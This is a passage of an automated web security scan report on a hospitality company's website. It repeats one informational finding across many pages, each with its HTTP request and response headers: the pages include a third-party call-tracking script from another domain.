User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:13:47 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15828


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.4. http://www.sabrehospitality.com/contact-us.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /contact-us.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:14:12 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36846


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.5. http://www.sabrehospitality.com/copyright.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /copyright.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /copyright.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:16:02 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12013


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.6. http://www.sabrehospitality.com/css/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /css/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /css/ HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 404 Not Found
Date: Tue, 05 Oct 2010 18:59:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11395


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.7. http://www.sabrehospitality.com/electronic-distribution-systems.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /electronic-distribution-systems.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /electronic-distribution-systems.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/consortia-rfp-management.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:17:35 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14205


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.8. http://www.sabrehospitality.com/hospitality-careers.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /hospitality-careers.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hospitality-careers.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:15:09 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38206


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.9. http://www.sabrehospitality.com/hospitality-consulting.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /hospitality-consulting.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hospitality-consulting.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:11:57 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12868


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.10. http://www.sabrehospitality.com/hospitality-solutions-company.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /hospitality-solutions-company.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hospitality-solutions-company.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:27:24 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15011


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.11. http://www.sabrehospitality.com/hospitality-solutions-results.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /hospitality-solutions-results.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hospitality-solutions-results.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:10:06 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12107


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.12. http://www.sabrehospitality.com/hotel-channel-management.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /hotel-channel-management.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hotel-channel-management.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/consortia-rfp-management.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:19:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13214


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.13. http://www.sabrehospitality.com/hotel-distribution-systems.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /hotel-distribution-systems.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hotel-distribution-systems.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:09:32 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13401


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.14. http://www.sabrehospitality.com/hotel-integration-management.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /hotel-integration-management.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hotel-integration-management.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/consortia-rfp-management.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:21:03 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14043


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.15. http://www.sabrehospitality.com/hotel-marketing-solutions.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /hotel-marketing-solutions.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hotel-marketing-solutions.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:08:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13600


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.16. http://www.sabrehospitality.com/hotel-technology-services.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /hotel-technology-services.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hotel-technology-services.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:11:24 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13126


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.17. http://www.sabrehospitality.com/images/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /images/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/ HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 404 Not Found
Date: Tue, 05 Oct 2010 19:07:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11395


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.18. http://www.sabrehospitality.com/images/buttons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /images/buttons/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/buttons/ HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 404 Not Found
Date: Tue, 05 Oct 2010 19:19:41 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11395


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.19. http://www.sabrehospitality.com/images/inset/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /images/inset/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/inset/ HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 404 Not Found
Date: Tue, 05 Oct 2010 19:19:10 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11395


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.20. http://www.sabrehospitality.com/images/layout/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /images/layout/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/layout/ HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 404 Not Found
Date: Tue, 05 Oct 2010 19:02:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11395


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.21. http://www.sabrehospitality.com/images/rss/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /images/rss/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/rss/ HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 404 Not Found
Date: Tue, 05 Oct 2010 19:23:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11395


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.22. http://www.sabrehospitality.com/mobile-marketing-company.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /mobile-marketing-company.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobile-marketing-company.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:24:16 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13535


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.23. http://www.sabrehospitality.com/press/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/ HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:28:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12085


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.24. http://www.sabrehospitality.com/press/-sabre-hospitality-solutions-selected-by-kimpton-hotels-restaurants-for-comprehensive-marketing-and-distribution  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/-sabre-hospitality-solutions-selected-by-kimpton-hotels-restaurants-for-comprehensive-marketing-and-distribution

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/-sabre-hospitality-solutions-selected-by-kimpton-hotels-restaurants-for-comprehensive-marketing-and-distribution HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:36:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25158


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
6.25. http://www.sabrehospitality.com/press/accor-hospitality-simplifies-travel-agency-shopping-with-sabre-hospitality-solutions-direct-connectivity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/accor-hospitality-simplifies-travel-agency-shopping-with-sabre-hospitality-solutions-direct-connectivity

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/accor-hospitality-simplifies-travel-agency-shopping-with-sabre-hospitality-solutions-direct-connectivity HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:33:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
